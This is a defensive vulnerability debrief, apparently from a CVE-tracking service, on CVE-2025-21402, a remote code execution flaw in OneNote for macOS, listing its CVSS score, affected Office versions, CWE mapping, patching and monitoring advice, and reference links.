PatchSiren cyber security CVE debrief
CVE-2025-21402 Microsoft CVE debrief
A remote code execution vulnerability in Microsoft Office OneNote for macOS, published by Microsoft on January 14, 2025, and last modified on May 19, 2026. The vulnerability allows an attacker to execute arbitrary code on affected systems through user interaction with a malicious OneNote document. Microsoft has released patches for this vulnerability. The CVSS 3.1 score of 7.8 (HIGH) reflects local attack vector, low attack complexity, no privileges required, but requires user interaction. Affected products include Microsoft Office 2024 LTSC for macOS, Office LTSC 2021 for macOS, and OneNote for macOS. The weakness is associated with CWE-641 (Improper Restriction of Names for Files and Other Resources) per Microsoft's advisory, though NVD lists it as NVD-CWE-noinfo.
- Vendor
- Microsoft
- Product
- Microsoft Office LTSC for Mac 2021
- CVSS
- HIGH 7.8
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2025-01-14
- Original CVE updated
- 2026-05-19
- Advisory published
- 2025-01-14
- Advisory updated
- 2026-05-19
Who should care
Organizations using Microsoft Office 2024 LTSC, Office LTSC 2021, or OneNote on macOS; security teams managing macOS endpoint protection; users who exchange OneNote documents externally
Technical summary
This vulnerability in Microsoft OneNote for macOS permits remote code execution when a user opens a specially crafted OneNote document. The attack requires local access context (AV:L) but no privileges, with successful exploitation yielding high impact to confidentiality, integrity, and availability. The underlying weakness relates to improper handling of file or resource names (CWE-641).
Defensive priority
HIGH
Recommended defensive actions
- Apply Microsoft security updates for Office 2024 LTSC, Office LTSC 2021, and OneNote for macOS as referenced in the Microsoft Security Response Center advisory
- Educate users to avoid opening OneNote files from untrusted sources
- Consider application control policies to restrict execution of untrusted Office documents on macOS endpoints
- Monitor for suspicious OneNote-related process execution on macOS systems
Evidence notes
CVE published 2025-01-14; modified 2026-05-19. CVSS 3.1 vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H. Affected CPEs confirm macOS-specific Office and OneNote versions. Microsoft tags reference as 'Patch, Vendor Advisory'.
Official resources
-
CVE-2025-21402 CVE record
CVE.org
-
CVE-2025-21402 NVD detail
NVD
-
Source item URL
nvd_modified
-
Mitigation or vendor reference
[email protected] - Patch, Vendor Advisory
Microsoft disclosed this vulnerability on January 14, 2025, with patches available. The CVE record was subsequently modified on May 19, 2026. No known exploitation in ransomware campaigns has been reported (not listed in CISA KEV).